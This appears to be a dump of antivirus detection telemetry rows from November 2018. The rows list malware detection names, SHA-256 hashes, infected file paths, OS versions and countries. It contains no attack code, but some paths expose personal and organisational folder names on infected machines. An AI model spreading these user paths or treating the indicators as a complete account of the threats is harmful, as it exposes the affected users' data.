  Row(detection=Row(filename='avscan-20181102-061855-25a711e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061855-25A711E8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052637-d7577790', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052637-D7577790', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054244-17b035ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054244-17B035EC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061707-e507505e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061707-E507505E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053036-6567494c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053036-6567494C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051005-8804572b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051005-8804572B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052745-ff90cf6f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052745-FF90CF6F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055134-534185f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055134-534185F3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053609-2bddfacb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053609-2BDDFACB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060817-a921fec6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060817-A921FEC6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060827-af7ec174', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060827-AF7EC174', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061824-13377211', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061824-13377211', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060413-17e480b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060413-17E480B1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052605-c420ec42', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052605-C420EC42', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052612-c85ddfd8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052612-C85DDFD8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055327-96c35059', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055327-96C35059', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051028-95d98594', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051028-95D98594', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060455-30e76017', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060455-30E76017', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053542-1c06b005', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053542-1C06B005', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061831-170a03a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061831-170A03A1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053007-5444ab5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053007-5444AB5C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055941-75ce2552', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055941-75CE2552', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T20:32:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051125-b768470b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051125-B768470B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053345-d6783058', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053345-D6783058', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054144-f381b828', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054144-F381B828', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T10:21:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050544-ec731ad0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050544-EC731AD0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062305-baac96f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062305-BAAC96F4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051411-1a6b33cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051411-1A6B33CC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062214-9bf58483', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062214-9BF58483', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T12:11:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055706-1982d941', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055706-1982D941', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050617-003568a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050617-003568A3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T01:46:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055406-ae47b7b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055406-AE47B7B1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055907-61858b09', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055907-61858B09', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050657-178cb6f4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050657-178CB6F4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061514-a1a3ce1d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061514-A1A3CE1D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053407-e381d8a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053407-E381D8A9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052336-6b0d3c70', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052336-6B0D3C70', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054803-d5868e38', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054803-D5868E38', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T18:01:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050538-e8d0767a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050538-E8D0767A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060248-e4e23b38', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060248-E4E23B38', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='\\\\?\\E:\\Bakup BLHD-DLH Perizinan 2017 (30 Okt 2018)\\APKL UMUM sd-2014\\MIH TANAH BUMBU\\SLDH&MIH 2014\\BIMTEK-MIH2014-bjm\\BLHD\\gvSIG\\petaOS\\MapSource\\Setup.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='39416db910e525c872133ee57c5260bbce8f2face1c2ce950d98311dfee7ef64', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:37:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152017-16713c97', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151340-DF30F2CA\\AVSCAN-20181101-152017-16713C97', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:39:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setuperror.exe', filepath='D:\\upgrate\\sources\\setuperror.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='3032cf6376bee15074add20c4bb2ae8e1e266689fc8cb602594921a479c81214', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T22:25:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110059-5de79e3a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_735ad0b6\\AVSCAN-20181101-105548-25D20D21\\AVSCAN-20181101-110059-5DE79E3A', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154909-7c983bf1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154909-7C983BF1', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:49:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='of lpa leadership.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PROPOSAL LPA\\Copy of LPA LEADERSHIP\\of LPA LEADERSHIP.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered farol', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered farol', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='06abc6933c1953a197eaab4f6116ef8aab1209dfc72aa10a38bddb5f0798546c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:31:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2015.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\PROPOSAL TRAINING RPG\\2015\\2015.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151939-1137297e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-151418-E472E91D\\AVSCAN-20181101-151939-1137297E', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:38:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201225-613779c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b5269777\\AVSCAN-20181101-195711-EC7B5239\\AVSCAN-20181101-201225-613779C1', filesize=384000, name='TR/Dropper.Gen.#M1.#R1'), hash='3ed509d7adfcc4c99f6f3d12bb7a72a9316b0fbf56e695bf83ea6c9b0c61fd43', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:47:35Z'), dt=datetime.date(2018, 11, 1)),
